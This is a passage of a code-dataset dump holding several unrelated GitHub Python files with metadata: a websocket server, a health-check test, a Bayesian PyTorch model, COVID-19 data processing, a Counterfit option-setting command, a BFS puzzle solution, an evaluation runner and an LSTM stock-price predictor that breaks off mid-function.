get_key(handshake_text)\n key = key + self.MAGIC\n key = hashlib.sha1(key.encode()).digest()\n key = base64.b64encode(key).decode()\n\n headers = {\"Upgrade\": \"websocket\", \"Connection\": \"Upgrade\",\n \"Sec-WebSocket-Accept\": key}\n\n headers = make_headers(headers)\n print('response')\n print(headers)\n self.request.sendall(headers.encode())\n\n def handle(self) -> None:\n self.handshake()\n print('handshake done!')\n while True:\n payload = Payload(self.request.recv(1024))\n print(payload)\n self.request.sendall(make_payload(b\"data received lol\"))\n\n def finish(self) -> None:\n print(\"Connection Over :(\", self.client_address[0])\n\n\nif __name__ == '__main__':\n socketserver.TCPServer.allow_reuse_address = True\n server = socketserver.ThreadingTCPServer((\"127.0.0.1\", 2449), Handler)\n server.serve_forever()\n", "repo_name": "kushurox/Secr3t", "sub_path": "websockets/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 3141, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.findall", "line_number": 59, "usage_type": "call"}, {"api_name": "socketserver.BaseRequestHandler", "line_number": 64, "usage_type": "attribute"}, {"api_name": "hashlib.sha1", "line_number": 72, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 73, "usage_type": "call"}, {"api_name": "socketserver.TCPServer", "line_number": 96, "usage_type": "attribute"}, {"api_name": "socketserver.ThreadingTCPServer", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "11958105157", "text": "from starlette import status\nfrom starlette.testclient import TestClient\n\nfrom api.main import api\nfrom tests.utils import assert_dicts\n\n\ndef test_health(\n client: TestClient,\n) -> None:\n response = client.get(\n url=\"/health\",\n )\n assert response.status_code == status.HTTP_200_OK\n expected = dict(\n message=f\"{api.title} - OK\",\n version=api.version,\n time=\"*\",\n )\n assert_dicts(original=response.json(), expected=expected)\n", "repo_name": "txemac/ecgs-service", "sub_path": "tests/test_main.py", "file_name": "test_main.py", "file_ext": "py", "file_size_in_byte": 477, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "starlette.testclient.TestClient", "line_number": 9, "usage_type": "name"}, {"api_name": "starlette.status.HTTP_200_OK", "line_number": 14, "usage_type": "attribute"}, {"api_name": "starlette.status", "line_number": 14, "usage_type": "name"}, {"api_name": "api.main.api.title", "line_number": 16, "usage_type": "attribute"}, {"api_name": "api.main.api", "line_number": 16, "usage_type": "name"}, {"api_name": "api.main.api.version", "line_number": 17, "usage_type": "attribute"}, {"api_name": "api.main.api", "line_number": 17, "usage_type": "name"}, {"api_name": "tests.utils.assert_dicts", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "28282063496", "text": "import math\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam\nfrom src.utils import set_device\nfrom torch.distributions import Normal\n\n\nclass BaseModel(nn.Module):\n \"\"\"\n Base model that implements common methods to all models.\n \"\"\"\n def __init__(\n self,\n n_train,\n sigma_b=1.,\n sigma_w=1.,\n sigma_default=1.,\n scale_sigma_w_by_dim=False,\n use_prior=False, \n device='cuda'\n ):\n super().__init__()\n self.n_train = n_train\n self.sigma_b = sigma_b\n self.sigma_w = sigma_w\n self.sigma_default = sigma_default\n self.scale_sigma_w_by_dim = scale_sigma_w_by_dim\n self.use_prior = use_prior\n self.device = set_device(device)\n\n # nn.Modules in order of execution in forward pass\n self.ordered_modules = nn.ModuleList()\n\n # Initialize prior distributions (also call this method when model\n # has been defined properly)\n self.init_prior_dist() \n\n\n def init_prior_dist(self):\n \"\"\"\n Initializes prior distributions.\n \"\"\"\n mean = torch.tensor(0, device=self.device)\n sigma_b = torch.tensor(self.sigma_b, device=self.device)\n sigma_w = torch.tensor(self.sigma_w, device=self.device)\n sigma_default = torch.tensor(self.sigma_default, device=self.device)\n\n # Default prior distribution\n self.prior_dist_default = Normal(loc=mean, scale=sigma_default)\n\n # Prior distribution of biases\n self.prior_dist_bias = Normal(loc=mean, scale=sigma_b)\n\n # Prior distributions of weights (might depend on input dim to layer)\n self.prior_dist_weight = dict()\n\n for name, param in self.named_parameters():\n if 'weight' in name:\n sigma = torch.clone(sigma_w)\n dim_in = param.shape[1] if param.dim() > 1 else 1\n if self.scale_sigma_w_by_dim:\n sigma = sigma / math.sqrt(dim_in)\n self.prior_dist_weight[dim_in] = Normal(loc=mean, scale=sigma)\n\n\n def forward(self, x):\n \"\"\"\n Implements forward pass using \"ordered_modules\" attribute.\n \"\"\"\n for module in self.ordered_modules:\n x = module(x)\n return x\n\n\n def log_prior(self):\n \"\"\"\n Prior distribution over weights.\n \"\"\"\n prior = 0.\n if self.use_prior:\n for name, param in self.named_parameters():\n if 'bias' in name:\n prior += self.prior_dist_bias.log_prob(param).sum()\n elif 'weight' in name:\n dim_in = param.shape[1] if param.dim() > 1 else 1\n prior += self.prior_dist_weight[dim_in].log_prob(param).sum()\n else:\n prior += self.prior_dist_default.log_prob(param).sum()\n\n return prior\n\n \n def log_density(self, model_output, target):\n \"\"\"\n Log probability of single data point.\n \"\"\"\n raise NotImplementedError\n \n\n def log_likelihood(self, model_output, target):\n \"\"\"\n Log likelihood.\n \"\"\"\n return self.log_density(model_output, target).sum()\n \n\n def log_joint(self, model_output, target):\n \"\"\"\n Log joint distribution.\n \"\"\"\n return self.log_likelihood(model_output, target) + self.log_prior()\n\n\n def loss(self, model_output, target):\n \"\"\"\n Loss is the scaled negative log joint distribution.\n \"\"\"\n return (\n -self.log_likelihood(model_output, target)/len(target) \n - self.log_prior()/self.n_train\n )\n #return (\n # -self.log_likelihood(model_output, target)\n # - len(target)*self.log_prior()/self.n_train\n #)\n\n\n def optimizer(self, weight_decay=0, lr=1e-3):\n \"\"\"\n Default optimizer.\n \"\"\"\n optimizer = Adam(self.parameters(), weight_decay=weight_decay, lr=lr)\n\n return optimizer", "repo_name": "jonasvj/active-learning", "sub_path": "src/models/base_model.py", "file_name": "base_model.py", "file_ext": "py", "file_size_in_byte": 4016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "src.utils.set_device", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.ModuleList", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.distributions.Normal", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.distributions.Normal", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.clone", "line_number": 60, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.distributions.Normal", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 133, "usage_type": "call"}]}
+{"seq_id": "38267469925", "text": "import json , urllib.request, operator\nfrom external import extract_element_from_json, unique, GetTop10Districts, GetDates, GetRawData, cleanRawData , GetTopTrends , GetCSVfromDict\nfrom collections import Counter\nimport itertools\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\n\nrawData = GetRawData() # Make API call to get raw case data\nrawData = cleanRawData(rawData) # Clean data to fix Delhi issue\ncases = rawData.get('raw_data',{}) # Get info about all cases\ncityTrends = GetTopTrends(rawData) # Get info about top 10 cities. City and dates with cases (no frequency)\nCityTrendsDailyFreq = {} # initialize a dictionary to hold daily frequency data\ncnt = Counter() # initalize counter to calculate daily frequency data\nd = np.array([]) # initialize numpy array to hold weekly data ('city', week number, # of cases)\n\n# Loop through CityTrends and generate daily count \nfor city in cityTrends :\n cnt = Counter(cityTrends[city])\n CityTrendsDailyFreq[city] = dict(cnt)\n#print(CityTrendsDailyFreq)\n# Loop through daily count and generate weekly count -- not perfect. In some cases, there will multiple entries for each week. Need to add when we generate report \naList = []\nfor i in CityTrendsDailyFreq.keys() : \n for key,value in CityTrendsDailyFreq[i].items() :\n a_date = datetime.strptime(key,'%d/%m/%Y')\n week_number = a_date.isocalendar()[1]\n #d = np.append(d,[[i,week_number,value]])\n #d = np.append(d,list([i,week_number,value]))\n aList.append([i,int(week_number),int(value)])\n\nfor current, nex in zip(aList, aList[1:]): \n if nex[0] == current[0] :\n #print(current[0], next[0])\n #print(\"in\") \n if nex[1] == current[1]:\n nex[2] = nex[2] + current[2]\n current[0] = '0'\n current[1] = 0\n current[2] = 0\nprint(aList)\n\n# Create nested dictionary in thr format: {Week Number: {{Hotspot 1: count}, {Hotspot 2: count}}}\nWeeks = list(range(0,53))\nWeeklyHotspots = {} \nTop10CitiesList = GetTop10Districts(rawData)\nTop10CitiesList.remove(\"\")\n#print(Top10CitiesList)\nfor week in Weeks:\n WeeklyHotspots.update({'week' + str(week) :{'null': 0}})\nfor week in Weeks:\n for Top10City in Top10CitiesList: \n WeeklyHotspots['week' + str(week)][Top10City] = 0\nfor week in Weeks:\n WeeklyHotspots.update({week :{}})\n for a in aList: \n WeeklyHotspots['week'+str(a[1])][a[0]] = a[2]\n\n# Export Weekly Frequency data to CSV \nwith open(\"WeeklyHotspots.csv\", 'w') as f:\n for key in WeeklyHotspots.keys():\n f.write(\"%s,%s\\n\"%(key,WeeklyHotspots[key]))", "repo_name": "sanAnand/COVID19India-States-Districts", "sub_path": "HotSpotWeeklyFreq.py", "file_name": "HotSpotWeeklyFreq.py", "file_ext": "py", "file_size_in_byte": 2673, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "external.GetRawData", "line_number": 11, "usage_type": "call"}, {"api_name": "external.cleanRawData", "line_number": 12, "usage_type": "call"}, {"api_name": "external.GetTopTrends", "line_number": 14, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "external.GetTop10Districts", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "5415164270", "text": "import argparse\nfrom cmd2 import with_argparser\nfrom cmd2 import with_category\nfrom rich.table import Table\nfrom counterfit.core.state import CFState\nfrom counterfit.core.output import CFPrint\nfrom typing import Union\n\n\ndef set_table(default_options, current_options, new_options):\n default_options_list = CFState.state(\n ).active_target.active_attack.options.default_options_list\n\n cfattack_options_list = CFState.state(\n ).active_target.active_attack.options.cfattack_options_list\n\n table = Table(header_style=\"bold magenta\")\n table.add_column(\"Parameter (type)\")\n table.add_column(\"Default\")\n table.add_column(\"Current\")\n table.add_column(\"New\")\n\n # print attack params first\n table.add_row(\"Algorithm Parameters\")\n table.add_row(\"--------------------\", \"--\", \"--\", \"--\")\n for option in default_options_list:\n default_value = default_options.get(option)\n current_value = current_options.get(option)\n new_value = new_options.get(option, \"-\")\n\n if new_value != current_value:\n table.add_row(f\"{option} ({str(type(default_value).__name__)})\",\n str(default_value), str(current_value), str(new_value))\n else:\n table.add_row(f\"{option} ({str(type(default_value).__name__)})\",\n str(default_value), str(current_value), \" \")\n\n # print cfspecific options next\n table.add_row()\n table.add_row(\"Attack Options\")\n table.add_row(\"--------------------\", \"--\", \"--\", \"--\")\n for option in cfattack_options_list:\n default_value = default_options.get(option)\n current_value = current_options.get(option)\n new_value = new_options.get(option, \"-\")\n\n if \"sample_index\" == option:\n parameter_type = \"int or expr\"\n else:\n parameter_type = str(type(default_value).__name__)\n\n if new_value != current_value:\n table.add_row(f\"{option} ({parameter_type})\",\n str(default_value), str(current_value), str(new_value))\n else:\n table.add_row(f\"{option} ({parameter_type})\",\n str(default_value), str(current_value), \" \")\n\n CFPrint.output(table)\n\n\ndef get_options() -> list:\n # dynamically get the list of options\n if not CFState.state().active_target:\n options = {}\n elif not CFState.state().active_target.active_attack:\n options = {}\n elif CFState.state().active_target.active_attack and hasattr(CFState.state().active_target.active_attack, 'options'):\n options = CFState.state().active_target.active_attack.options.get_all_options()\n else:\n options = {}\n return options\n\ndef get_sample_index(sample_index: str) -> Union[list, int, range, None]:\n try:\n sample_index = eval(sample_index)\n except Exception as e:\n CFPrint.failed(f\"Error parsing '--sample_index {sample_index}: {e}\")\n return None\n\n if type(sample_index) is tuple:\n sample_index = list(sample_index)\n\n if type(sample_index) not in (range, int, list):\n CFPrint.failed(f\"Error parsing '--sample_index {sample_index}: expression must result in a 'list', 'range' or 'int'\")\n return None\n\n if type(sample_index) is list:\n if any([type(el) is not int for el in sample_index]):\n CFPrint.failed(f\"Error parsing '--sample_index {sample_index}': list must only contain integers\")\n return None\n \n return sample_index\n\nNoneType = type(None)\ndef get_clip_values(clip_values: str) -> Union[tuple,NoneType]:\n try:\n clip_values = eval(clip_values)\n except Exception as e:\n CFPrint.failed(f\"Error parsing '--clip_values {clip_values}': {e}\")\n return None\n\n if clip_values is None:\n return \"None\"\n\n if type(clip_values) not in (tuple,):\n CFPrint.failed(f\"Error parsing '--clip_values {clip_values}: expression must result in a 'tuple' or 'None'\")\n return None\n\n return clip_values\n\n\ndef parse_numeric(argname: str, val_str: str) -> Union[int, float, None]:\n # simple check for \"inf\" as a shortcut to float('inf)\n if type(val_str) is str and val_str == \"inf\":\n return float('inf')\n try:\n val = eval(val_str)\n except Exception as e:\n CFPrint.failed(f\"Error parsing --'{argname} {val_str}': {e}\")\n return None\n\n if type(val) not in (int, float):\n CFPrint.failed(f\"Error parsing '--{argname} {val_str}': expression must result in a 'int' or 'float'\")\n return None\n\n return val\n\n\ndef parse_boolean(argname: str, val_str: str) -> Union[bool, None]:\n if val_str.lower() in (\"true\", \"t\", \"yes\", \"y\", \"1\"):\n return True\n elif val_str.lower() in (\"false\", \"f\", \"no\", \"n\", \"0\"):\n return False\n else:\n CFPrint.failed(f\"Error parsing '--{argname} {val_str}': must be 'true' or 'false'\")\n return None\n\n\n# dynamic option add\nparser = argparse.ArgumentParser()\nfor option, value in get_options().items():\n if \"sample_index\" == option or \"clip_values\" == option:\n parser.add_argument(f\"--{option}\", type=str, default=str(value))\n elif type(value) in (float, int):\n parser.add_argument(f\"--{option}\", type=str, default=str(value))\n elif type(value) == bool:\n parser.add_argument(f\"--{option}\", type=str, default=str(value))\n else:\n parser.add_argument(\n f\"--{option}\", type=type(value), default=value)\n\n\ndef update_options(target, partial_options):\n default_options = target.active_attack.options.previous_options[0]\n current_options = target.active_attack.options.get_all_options()\n new_options = current_options.copy()\n\n new_options = {}\n for option, val in partial_options.items():\n if type(val) is bool and val: # toggle boolean values\n val = not current_options.get(option)\n new_options[option] = val\n\n target.active_attack.options.set_options(new_options)\n\n return default_options, current_options, new_options\n\n\n@with_argparser(parser)\n@with_category(\"Counterfit Commands\")\ndef do_set(self, args: argparse.Namespace) -> None:\n \"\"\"Set parameters of the active attack on the active target using \n --param1 val1 --param2 val2.\n\n For infinity, use 'inf' or 'float(\"inf\")'.\n\n This command replaces built-in \"set\" command, which is renamed to \"setg\".\n \"\"\"\n target = CFState.state().get_active_target()\n if not target:\n CFPrint.warn(\"No active target. Try 'interact '\")\n return\n\n if not target.get_active_attack():\n CFPrint.warn(\"No active attack. Try 'use '\")\n return\n\n default_options = target.active_attack.options.previous_options[0]\n\n for argname, argval in args.__dict__.items():\n if argname == 'clip_values':\n clip_values = get_clip_values(args.clip_values)\n if clip_values is None:\n return\n if clip_values==\"None\": # None is a valid type we handle separately\n clip_values = None\n args.clip_values = clip_values\n elif argname == 'sample_index':\n sample_index = get_sample_index(args.sample_index)\n if sample_index is None:\n return\n args.sample_index = sample_index\n elif type(default_options.get(argname)) in (float, int) and type(argval) is str:\n # parse numeric type\n argval = parse_numeric(argname, argval)\n if argval is None:\n return\n args.__dict__[argname] = argval\n elif type(default_options.get(argname)) is bool:\n # parse boolean type\n argval = parse_boolean(argname, argval)\n if argval is None:\n return\n args.__dict__[argname] = argval\n\n default_options, current_options, new_options = update_options(target, args.__dict__)\n\n set_table(default_options, current_options, new_options)\n", "repo_name": "popoolasubomi/AIV", "sub_path": "counterfit/counterfit/commands/set.py", "file_name": "set.py", "file_ext": "py", "file_size_in_byte": 7942, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "counterfit.core.state.CFState.state", "line_number": 11, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 11, "usage_type": "name"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 14, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 14, "usage_type": "name"}, {"api_name": "rich.table.Table", "line_number": 17, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint.output", "line_number": 59, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 59, "usage_type": "name"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 64, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 64, "usage_type": "name"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 66, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 66, "usage_type": "name"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 68, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 68, "usage_type": "name"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 69, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 69, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 78, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 78, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 85, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 85, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 90, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 90, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 74, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 100, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 100, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 107, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 96, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 120, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 120, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 124, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 113, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 136, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 130, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 141, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 172, "usage_type": "attribute"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 180, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 180, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.warn", "line_number": 182, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 182, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.warn", "line_number": 186, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 186, "usage_type": "name"}, {"api_name": "cmd2.with_argparser", "line_number": 170, "usage_type": "call"}, {"api_name": "cmd2.with_category", "line_number": 171, "usage_type": "call"}]}
+{"seq_id": "3320937572", "text": "# BOJ 7569번 문제: 토마토\n# Using BFS because its more efficient in finding solutions nearby a source\nfrom collections import deque\ndef solution():\n M, N, H = map(int, input().split())\n box = []\n\n dx, dy, dz = [-1, 1, 0, 0, 0, 0], [0, 0, -1, 1, 0, 0], [0, 0, 0, 0, -1, 1]\n answer = 0\n\n for h in range(H):\n layer = []\n for n in range(N):\n row = list(map(int, input().split()))\n layer.append(row)\n box.append(layer)\n\n queue = deque([])\n for ___ in range(H):\n for _ in range(N):\n for __ in range(M):\n if box[___][_][__] == 1:\n queue.append([___, _, __])\n\n while queue:\n z, x, y = queue.popleft()\n for j in range(6):\n nz, nx, ny = dz[j] + z, dx[j] + x, dy[j] + y\n if 0 <= nx < N and 0 <= ny < M and 0 <= nz < H and box[nz][nx][ny] == 0:\n box[nz][nx][ny] = box[z][x][y] + 1\n queue.append([nz, nx, ny])\n\n for i in box:\n for j in i:\n for k in j:\n if k == 0:\n print(-1)\n exit(0)\n answer = max(answer, max(j))\n\n print(answer - 1)\n\nif '__main__' == __name__:\n solution()", "repo_name": "KKodiac/Python", "sub_path": "BOJ/DFS_BFS/7569.py", "file_name": "7569.py", "file_ext": "py", "file_size_in_byte": 1242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.deque", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "30883317699", "text": "# >>>\nif __name__ == '__main__':\n import os\n import sys\n\n _project_dir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n os.environ['PROJECT_DIR'] = _project_dir\n sys.path.append(_project_dir)\n del _project_dir\n# <<<\n\nimport shutil\nfrom copy import deepcopy\nfrom pathlib import Path\nfrom typing import Optional\n\nimport lib\n\n\ndef main(\n path: Path,\n n_seeds: int = 15,\n function: Optional[str] = None,\n *,\n force: bool = False,\n):\n path = lib.get_path(path)\n if path.name.endswith('-tuning'):\n from_tuning = True\n assert function is None\n assert (path / 'DONE').exists()\n\n tuning_report = lib.load_report(path)\n function_qualname = tuning_report['config']['function']\n template_config = tuning_report['best']['config']\n\n path = path.with_name(path.name.replace('tuning', 'evaluation'))\n path.mkdir(exist_ok=True)\n else:\n from_tuning = False\n assert path.name.endswith('-evaluation')\n assert function is not None\n function_qualname = function\n template_config = lib.load_config(path / '0.toml')\n\n function_: lib.Function = lib.import_(function_qualname)\n for seed in range(n_seeds):\n config = deepcopy(template_config)\n config['seed'] = seed\n if 'catboost' in function_qualname:\n if config['model']['task_type'] == 'GPU':\n config['model']['task_type'] = 'CPU' # this is crucial for good results\n thread_count = config['model'].get('thread_count', 1)\n config['model']['thread_count'] = max(thread_count, 4)\n config_path = path / f'{seed}.toml'\n try:\n if seed > 0 or from_tuning:\n lib.dump_config(config, config_path)\n function_(config, config_path.with_suffix(''), force=force)\n except Exception:\n if seed > 0 or from_tuning:\n config_path.unlink(True)\n shutil.rmtree(config_path.with_suffix(''), True)\n raise\n\n\nif __name__ == '__main__':\n lib.configure_libraries()\n lib.run_cli(main)\n", "repo_name": "yandex-research/tabular-dl-tabr", "sub_path": "bin/evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 2123, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 167, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 23, "usage_type": "name"}, {"api_name": "lib.get_path", "line_number": 27, "usage_type": "call"}, {"api_name": "lib.load_report", "line_number": 33, "usage_type": "call"}, {"api_name": "lib.load_config", "line_number": 44, "usage_type": "call"}, {"api_name": "lib.Function", "line_number": 46, "usage_type": "attribute"}, {"api_name": "lib.import_", "line_number": 46, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 48, "usage_type": "call"}, {"api_name": "lib.dump_config", "line_number": 58, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 63, "usage_type": "call"}, {"api_name": "lib.configure_libraries", "line_number": 68, "usage_type": "call"}, {"api_name": "lib.run_cli", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "30663921302", "text": "# -*- coding: utf-8 -*-\n\n# Part 1 - Data Preprocessing\n\n# Importing the libraries\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# Importing the training set\ndataset_train = pd.read_csv('Google_Stock_Price_Train.csv')\ntraining_set = dataset_train.iloc[:, 1:2].values\n\n# Feature Scaling (Normalização, Padronização)\n# OBS: Irei testar padronização nos dados, usando o StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nmms = MinMaxScaler(feature_range=(0, 1))\ntraining_set_scaled = mms.fit_transform(training_set)\n\n# Creating a data structure with 60 timesteps and 1 output\nX_train = []\ny_train = []\nfor i in range(60, 1258):\n X_train.append(training_set_scaled[i-60:i])\n y_train.append(training_set_scaled[i])\nX_train, y_train = np.array(X_train), np.array(y_train)\n\n# Part 2 - Building the RNN\n\n# Importing the Keras libraries and packages\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Dropout\n\n# Initialising the RNN\nregressor = Sequential()\n\n# Adding the first LSTM layer and some Dropout regularization\nregressor.add(LSTM(units=100, return_sequences=True, input_shape=(X_train.shape[1], 1)))\nregressor.add(Dropout(.2))\n\n# Adding a secund LTSM layer and some Dropout regularization\nregressor.add(LSTM(units=100, return_sequences=True))\nregressor.add(Dropout(.2))\n\n# Adding a third LTSM layer and some Dropout regularization\nregressor.add(LSTM(units=100, return_sequences=True))\nregressor.add(Dropout(.2))\n\n# Adding a third LTSM layer and some Dropout regularization\nregressor.add(LSTM(units=100, return_sequences=True))\nregressor.add(Dropout(.2))\n\n# Adding a third LTSM layer and some Dropout regularization\nregressor.add(LSTM(units=100, return_sequences=True))\nregressor.add(Dropout(.2))\n\n# Adding a fourth LTSM layer and some Dropout regularization\nregressor.add(LSTM(units=100))\nregressor.add(Dropout(.2))\n\n# Adding the output layer\nregressor.add(Dense(units=1))\n\n# Compiling the RNN\nregressor.compile(optimizer='adam', loss='mean_squared_error')\n\n# Fitting the RNN to the Training set\nregressor.fit(X_train, y_train, epochs=100, batch_size=32)\n\n\n# Part 3 - Making the predictions and Visualizing the results\n\n# Getting the real stock price of 2017\ndataset_test = pd.read_csv('Google_Stock_Price_Test.csv')\nreal_stock_price = dataset_test.iloc[:, 1:2].values\n\n# Getting the predicted stock price of 2017\ndataset_total = pd.concat((dataset_train.Open, dataset_test.Open), axis=0)\ninputs = dataset_total[len(dataset_total) - len(dataset_test) - 60:].values\ninputs = inputs.reshape(-1, 1)\ninputs = mms.fit_transform(inputs)\n\nX_test = []\nfor i in range(60, 80):\n X_test.append(inputs[i-60:i, 0])\nX_test = np.array(X_test)\nX_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))\npredicted_stock_price = regressor.predict(X_test)\npredicted_stock_price = mms.inverse_transform(predicted_stock_price)\n\n# Visualising the result\nimport seaborn as sns\nsns.set_style('darkgrid')\n\nplt.plot(real_stock_price, color='r', label='Real Google Stock Price')\nplt.plot(predicted_stock_price, color='b', label='Predicted Google Stock Price')\nplt.title('Google Stock Price Prediction')\nplt.xlabel('Time')\nplt.ylabel('Google Stock Price')\nplt.legend()\nplt.show()\n\n# Evaluating the RNN\nimport math\nfrom sklearn.metrics import mean_squared_error\nrmse = math.sqrt(mean_squared_error(real_stock_price, predicted_stock_price))\n\n# Improving the RNN\n\n'''\nAqui estão diferentes maneiras de melhorar o modelo RNN:\n\n1 - Obtendo mais dados de treinamento: treinamos nosso modelo nos últimos 5 anos do Google Stock Price, \n mas seria ainda melhor treiná-lo nos últimos 10 anos.\n\n2 - Aumentando o número de prazos: o modelo lembrou os preços das ações dos 60 dias financeiros anteriores para prever o preço das ações do dia seguinte. \n Isso porque escolhemos um número de 60 timesteps (3 meses).\n Você poderia tentar aumentar o número de timesteps, \n escolhendo por exemplo 120 timesteps (6 meses). (TESTADO - MODELO PIOROU)\n\n3 - Adicionando alguns outros indicadores: se você tiver o instinto financeiro de que o preço das ações de algumas outras empresas possa estar correlacionado ao do Google, \n você pode adicionar esse outro preço de ação como um novo indicador nos dados de treinamento.\n\n4 - Adicionando mais camadas LSTM: construímos um RNN com quatro camadas LSTM, \n mas você pode tentar ainda mais.(TESTADO - NÃO HOUVE NENHUMA MELHORIA)\n\n5 - Adicionando mais neurônios nas camadas LSTM: destacamos o fato de que precisávamos de um número elevado de neurônios nas camadas LSTM para responder melhor à complexidade do problema e optamos por incluir 50 neurônios em cada uma das nossas 4 camadas LSTM. \n Você poderia tentar uma arquitetura com ainda mais neurônios em cada uma das 4 (ou mais) camadas LSTM. (TESTADO - O MODELO MELHOROU)\n'''\n\n\n# Turning the RNN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Dropout\n\ndef build_classifier(optimizer):\n regressor = Sequential()\n 